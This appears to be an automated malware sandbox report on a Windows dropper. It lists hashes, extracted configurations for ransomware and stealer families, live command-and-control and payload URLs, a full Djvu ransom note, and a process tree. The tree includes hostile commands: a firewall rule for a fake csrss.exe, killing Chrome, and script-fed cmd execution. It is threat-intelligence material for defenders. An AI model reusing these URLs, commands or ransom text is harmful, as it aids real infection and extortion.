Analysis
- max time kernel: 151s
- max time network: 156s
- platform: windows10-2004_x64
- resource: win10v2004-en-20220113
- submitted: 12-03-2022 09:27

Static task: static1

Behavioral task: behavioral1
- Sample: 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe
- Resource: win7-20220310-en

Behavioral task: behavioral2
- Sample: 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe
- Resource: win10v2004-en-20220113

General
- Target: 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe
- Size: 9.1MB
- MD5: 663564f2c43b25ba18bf277ba0b9ab20
- SHA1: 1f5966a11de1ac03bd39c40292a8d5c0a5bb3d62
- SHA256: 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4
- SHA512: 335486d893bd52a01867bc02776b6baf76fe867289e89b38267da3e5a33ac3c6fdb45c709fa18ba79eae19e8d626ac470e10a33dff50461961e2aebb11ec6879
Malware Config

Extracted: http://62.204.41.71/cs/SkyDrive.oo
Extracted: http://62.204.41.71/cs/Fax.oo
Extracted: http://62.204.41.71/cs/RED.oo
Extracted: http://62.204.41.71/Offer/Offer.oo

Extracted: socelars
- http://www.iyiqian.com/
- http://www.xxhufdc.top/
- http://www.uefhkice.xyz/
- http://www.fcektsy.top/

Extracted: metasploit
- windows/single_exec

Extracted: vidar
- 39.9
- 933
- https://prophefliloc.tumblr.com/
- profile_id: 933

Extracted: smokeloader
- 2020

Extracted: raccoon
- 1.7.3
- 92be0387873e54dd629b9bfa972c3a9a88e6726c
- url4cnc: https://t.me/gishsunsetman

Extracted: raccoon
- a26fbf1c2d0b49bb23b4438deef490ea1c53ab14
- url4cnc:

Extracted: djvu
- http://fuyt.org/test3/get.php
- extension: .xcbg
- offline_id: y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
- payload_url: http://zerit.top/dl/build2.exe
- payload_url: http://fuyt.org/files/1/build3.exe
- ransomnote:
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

Extracted: redline
- PRO1203PRO
- 144.76.173.68:16125
- auth_value: 7a7fbf2ba1c874d2d5050d9184bd1348

Extracted: vidar
- 50.7
- 937
- https://ruhr.social/@sam9al
- https://koyu.space/@samsa2l
- profile_id: 937
Signatures

Detected Djvu ransomware (8 IoCs)
Processes:
- behavioral2/memory/5072-281-0x0000000000400000-0x0000000000537000-memory.dmp (family_djvu)
- behavioral2/memory/5072-284-0x0000000000400000-0x0000000000537000-memory.dmp (family_djvu)
- behavioral2/memory/5144-280-0x0000000002240000-0x000000000235B000-memory.dmp (family_djvu)
- behavioral2/memory/5072-278-0x0000000000400000-0x0000000000537000-memory.dmp (family_djvu)
- behavioral2/memory/5072-276-0x0000000000400000-0x0000000000537000-memory.dmp (family_djvu)
- behavioral2/memory/7668-376-0x0000000000400000-0x0000000000537000-memory.dmp (family_djvu)
- behavioral2/memory/7668-382-0x0000000000400000-0x0000000000537000-memory.dmp (family_djvu)
- behavioral2/memory/7668-370-0x0000000000400000-0x0000000000537000-memory.dmp (family_djvu)

Djvu Ransomware
Ransomware which is a variant of the STOP family.

Glupteba Payload (2 IoCs)
Processes:
- behavioral2/memory/3232-184-0x0000000005270000-0x0000000005B96000-memory.dmp (family_glupteba)
- behavioral2/memory/3232-193-0x0000000000400000-0x000000000309C000-memory.dmp (family_glupteba)

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

OnlyLogger
A tiny loader that uses IPLogger to get its payload.

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
- Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process (pid 3092, pid_target 744, process rUNdlL32.eXe)

Raccoon Stealer Payload (3 IoCs)
Processes:
- behavioral2/memory/2008-201-0x0000000000400000-0x0000000000495000-memory.dmp (family_raccoon)
- behavioral2/memory/2008-204-0x0000000000400000-0x0000000000495000-memory.dmp (family_raccoon)
- behavioral2/memory/2008-205-0x0000000000400000-0x0000000000495000-memory.dmp (family_raccoon)

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (1 IoC)
Processes:
- behavioral2/memory/6716-304-0x0000000000400000-0x0000000000420000-memory.dmp (family_redline)

SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars Payload (2 IoCs)
Processes:
- C:\Users\Admin\AppData\Local\Temp\Install.exe (family_socelars)
- C:\Users\Admin\AppData\Local\Temp\Install.exe (family_socelars)

Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
Processes:
- PID 1832 created 3232 (svchost.exe -> Info.exe)

suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6

suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

OnlyLogger Payload (2 IoCs)
Processes:
- behavioral2/memory/5344-257-0x0000000001FC0000-0x0000000002004000-memory.dmp (family_onlylogger)
- behavioral2/memory/5344-258-0x0000000000400000-0x000000000048C000-memory.dmp (family_onlylogger)

Vidar Stealer (3 IoCs)
Processes:
- behavioral2/memory/4312-188-0x0000000000400000-0x0000000002CBE000-memory.dmp (family_vidar)
- behavioral2/memory/4312-189-0x0000000004900000-0x000000000499D000-memory.dmp (family_vidar)
- behavioral2/memory/440-275-0x0000000000400000-0x00000000004CE000-memory.dmp (family_vidar)

Creates new service(s) (1 TTP)

Downloads MZ/PE file

Executes dropped EXE (35 IoCs)
Processes:
- PID 3380 Files.exe
- PID 4556 KRSetp.exe
- PID 388 Install.exe
- PID 4056 jfiag3g_gg.exe
- PID 4600 Folder.exe
- PID 3232 Info.exe
- PID 4252 Install_Files.exe
- PID 4784 pub2.exe
- PID 4704 jamesdirect.exe
- PID 4312 Litever01.exe
- PID 1440 Complete.exe
- PID 1756 md9_1sjm.exe
- PID 4072 msedge.exe
- PID 4980 jfiag3g_gg.exe
- PID 3512 Info.exe
- PID 2008 7E4KGS5KRYdTYM9UbhbVCkXW.exe
- PID 4764 Zh8HfuR0H99IFab95QhRkd_A.exe
- PID 2008 7E4KGS5KRYdTYM9UbhbVCkXW.exe
- PID 944 2u2YsUgpyr8uoBqHizKdCUQM.exe
- PID 1920 find.exe
- PID 4596 WRV_nd3147gQ3tPAc_hVHB_8.exe
- PID 440 _7j7HuriYtP_9nQOmZOUnbSw.exe
- PID 5144 UTyTq8w2BBV94iBaBtwpceVf.exe
- PID 5152 aCtrrIoeuw8gN6TISehzPUES.exe
- PID 5168 YStoivV3td8fghxqUu2SgpQ_.exe
- PID 5208 g5B8YLScVV_0zfy7P6hxlaVs.exe
- PID 5216 y8vAvBD8LNXIpwE1EDcwkL93.exe
- PID 5284 8RKZYsnKNWccv71JTmpromDN.exe
- PID 5304 LPej8ron26c7SWsJgrCsKxFE.exe
- PID 5320 UkPQqosaxZEWN_UuknyJ6RgF.exe
- PID 5328 _XfxA3EI0PT3ie5OHUHFQLMm.exe
- PID 5344 cE8kh8YndrJJjfgDiRSXHBuB.exe
- PID 5448 b2B20UBKQvo9NdMQVBat3qrA.exe
- PID 5588 UasdIN9S3pk1MBF6e1GkKLMu.exe
- PID 5596 bL85TOQU5EEEmVqgNQhYQtof.exe

Modifies Windows Firewall (1 TTP)

Processes:
- C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe (upx)
- C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe (upx)
- C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe (upx)
- C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe (upx)
- C:\Users\Admin\Documents\y8vAvBD8LNXIpwE1EDcwkL93.exe (upx)
- C:\Users\Admin\Documents\aCtrrIoeuw8gN6TISehzPUES.exe (upx)
- C:\Users\Admin\Documents\aCtrrIoeuw8gN6TISehzPUES.exe (upx)

Processes:
- C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe (vmprotect)
- C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe (vmprotect)
- behavioral2/memory/1756-163-0x0000000000400000-0x000000000060D000-memory.dmp (vmprotect)

Checks computer location settings (2 TTPs, 4 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
- Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation (g5B8YLScVV_0zfy7P6hxlaVs.exe)
- Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation (y8vAvBD8LNXIpwE1EDcwkL93.exe)
- Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation (8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe)
- Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation (Folder.exe)

Loads dropped DLL (1 IoC)
Processes:
- PID 3324 rundll32.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application (2 TTPs, 1 IoC)
Processes:
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex" (Files.exe)

Processes:
- Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (md9_1sjm.exe)

Legitimate hosting services abused for malware hosting/C2 (1 TTP)

Looks up external IP address via web service (11 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
- flow 17: ipinfo.io
- flow 229: ipinfo.io
- flow 230: ipinfo.io
- flow 326: ipinfo.io
- flow 342: ipinfo.io
- flow 8: ip-api.com
- flow 18: ipinfo.io
- flow 24: ipinfo.io
- flow 327: ipinfo.io
- flow 353: ipinfo.io
- flow 384: ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
Processes:
- PID 2008 7E4KGS5KRYdTYM9UbhbVCkXW.exe

Suspicious use of SetThreadContext (1 IoC)
Processes:
- PID 4704 set thread context of 2008 (jamesdirect.exe -> 7E4KGS5KRYdTYM9UbhbVCkXW.exe)

Launches sc.exe
Sc.exe is a Windows utility to control services on the system.

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (22 IoCs)
Processes:
- PID 3644 WerFault.exe, target PID 3324 rundll32.exe
- PID 3896 WerFault.exe, target PID 2008 jamesdirect.exe
- PID 5748 WerFault.exe, target PID 4764 Zh8HfuR0H99IFab95QhRkd_A.exe
- PID 5936 WerFault.exe, target PID 5284
- PID 6008 WerFault.exe, target PID 5304 LPej8ron26c7SWsJgrCsKxFE.exe
- PID 3880 WerFault.exe, target PID 5344 cE8kh8YndrJJjfgDiRSXHBuB.exe
- PID 5952 WerFault.exe, target PID 5304 LPej8ron26c7SWsJgrCsKxFE.exe
- PID 6332 WerFault.exe, target PID 2008 7E4KGS5KRYdTYM9UbhbVCkXW.exe
- PID 6496 WerFault.exe, target PID 5344 cE8kh8YndrJJjfgDiRSXHBuB.exe
- PID 2696 WerFault.exe, target PID 4596 WRV_nd3147gQ3tPAc_hVHB_8.exe
- PID 7896 WerFault.exe, target PID 6556 onGvjMU2m141G5PV7GmGrEm_.exe
- PID 7360 WerFault.exe, target PID 6928
- PID 2500 WerFault.exe, target PID 4764 Zh8HfuR0H99IFab95QhRkd_A.exe
- PID 8108 WerFault.exe, target PID 6780 3LYRJa_h21qcP23mkEqZVhGK.exe
- PID 7432 WerFault.exe, target PID 5344 cE8kh8YndrJJjfgDiRSXHBuB.exe
- PID 3580 WerFault.exe, target PID 7668 qwVE9lVPJ5BFPzZyglrA04yI.exe
- PID 5416 WerFault.exe, target PID 6928 hvjoV9uoVBrkQ52viZaB6CDF.exe
- PID 8148 WerFault.exe, target PID 7200 mNNTeptv39xQbiKXUFJlGYda.exe
- PID 6392 WerFault.exe, target PID 6780 3LYRJa_h21qcP23mkEqZVhGK.exe
- PID 772 WerFault.exe, target PID 6592 bNDiBhKxC6KPXgLxJ0eAvuwe.exe
- PID 1712 WerFault.exe, target PID 6140 powershell.exe
- PID 2552 WerFault.exe, target PID 5344 cE8kh8YndrJJjfgDiRSXHBuB.exe

Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Processes:
- Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (pub2.exe)
- Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (pub2.exe)
- Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (pub2.exe)

Creates scheduled task(s) (1 TTP, 3 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
- PID 4220 schtasks.exe
- PID 5336 schtasks.exe
- PID 6760 schtasks.exe

Delays execution with timeout.exe (1 IoC)
Processes:
- PID 1172 timeout.exe

Enumerates processes with tasklist (1 TTP, 4 IoCs)
Processes:
- PID 7044 tasklist.exe
- PID 7040 tasklist.exe
- PID 3580 tasklist.exe
- PID 5516 tasklist.exe

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (msedge.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (msedge.exe)
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (msedge.exe)

Kills process with taskkill (2 IoCs)
Processes:
- PID 1408 taskkill.exe
- PID 7628 taskkill.exe

Modifies registry class (1 IoC)
Processes:
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ (msedge.exe)

Processes:
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 (Litever01.exe)
- Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob value not present on the page] (Litever01.exe)

Suspicious behavior: EnumeratesProcesses (64 IoCs)

Suspicious behavior: MapViewOfSection (1 IoC)
Processes:
- PID 4784 pub2.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (4 IoCs)
Processes:
- PID 3696 msedge.exe
- PID 3696 msedge.exe
- PID 3696 msedge.exe
- PID 3696 msedge.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)

Suspicious use of FindShellTrayWindow (3 IoCs)
Processes:
- PID 3696 msedge.exe
- PID 3696 msedge.exe
- PID 3696 msedge.exe

Suspicious use of SetWindowsHookEx (18 IoCs)
Processes:
- PID 4252 Install_Files.exe
- PID 1440 Complete.exe
- PID 2008 7E4KGS5KRYdTYM9UbhbVCkXW.exe
- PID 4764 Zh8HfuR0H99IFab95QhRkd_A.exe
- PID 4596 WRV_nd3147gQ3tPAc_hVHB_8.exe
- PID 440 _7j7HuriYtP_9nQOmZOUnbSw.exe
- PID 5144 UTyTq8w2BBV94iBaBtwpceVf.exe
- PID 5208 g5B8YLScVV_0zfy7P6hxlaVs.exe
- PID 5328 _XfxA3EI0PT3ie5OHUHFQLMm.exe
- PID 5344 cE8kh8YndrJJjfgDiRSXHBuB.exe
- PID 5448 b2B20UBKQvo9NdMQVBat3qrA.exe
- PID 5216 y8vAvBD8LNXIpwE1EDcwkL93.exe
- PID 5284 8RKZYsnKNWccv71JTmpromDN.exe
- PID 5320 UkPQqosaxZEWN_UuknyJ6RgF.exe
- PID 5168 YStoivV3td8fghxqUu2SgpQ_.exe
- PID 5304 LPej8ron26c7SWsJgrCsKxFE.exe
- PID 5588 UasdIN9S3pk1MBF6e1GkKLMu.exe
- PID 5216 y8vAvBD8LNXIpwE1EDcwkL93.exe

Suspicious use of WriteProcessMemory (64 IoCs)

Processes

C:\Users\Admin\AppData\Local\Temp\8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\Files.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Files.exe"
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      - Executes dropped EXE

    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses

  C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

  C:\Users\Admin\AppData\Local\Temp\Install.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Install.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im chrome.exe

      C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im chrome.exe
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij7
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbf89e46f8,0x7ffbf89e4708,0x7ffbf89e4718

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:8

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5016 /prefetch:8

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:1
      - Executes dropped EXE

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings

      C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x258,0x25c,0x260,0x234,0x264,0x7ff602625460,0x7ff602625470,0x7ff602625480

    C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1264 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,10597585660801886886,4073456556855222842,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6296 /prefetch:23⤵
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a3⤵
-
C:\Users\Admin\AppData\Local\Temp\Info.exe"C:\Users\Admin\AppData\Local\Temp\Info.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Info.exe"C:\Users\Admin\AppData\Local\Temp\Info.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
-
C:\Users\Admin\AppData\Local\Temp\Install_Files.exe"C:\Users\Admin\AppData\Local\Temp\Install_Files.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\8xQttYQw__jO6jcZPLtfAve5.exe"C:\Users\Admin\Documents\8xQttYQw__jO6jcZPLtfAve5.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif4⤵
-
C:\Windows\SysWOW64\cmd.execmd5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq BullGuardCore.exe"6⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "bullguardcore.exe"6⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"6⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\OsRbtAhgMZlouovOA63p_7CS.exe"C:\Users\Admin\Documents\OsRbtAhgMZlouovOA63p_7CS.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\34a5e036-8ebc-4164-b01e-fc5333118faa.exe"C:\Users\Admin\AppData\Local\Temp\34a5e036-8ebc-4164-b01e-fc5333118faa.exe"4⤵
-
C:\Users\Admin\Documents\3LYRJa_h21qcP23mkEqZVhGK.exe"C:\Users\Admin\Documents\3LYRJa_h21qcP23mkEqZVhGK.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 6164⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 6364⤵
- Program crash
-
C:\Users\Admin\Documents\eoUnH76y_45c6j6dcX8_bGA7.exe"C:\Users\Admin\Documents\eoUnH76y_45c6j6dcX8_bGA7.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS49D3.tmp\Install.exe.\Install.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS7529.tmp\Install.exe.\Install.exe /S /site_id "525403"5⤵
-
C:\Users\Admin\Documents\QbzwuFXxEJB1z9zPyT5N7oVX.exe"C:\Users\Admin\Documents\QbzwuFXxEJB1z9zPyT5N7oVX.exe"3⤵
-
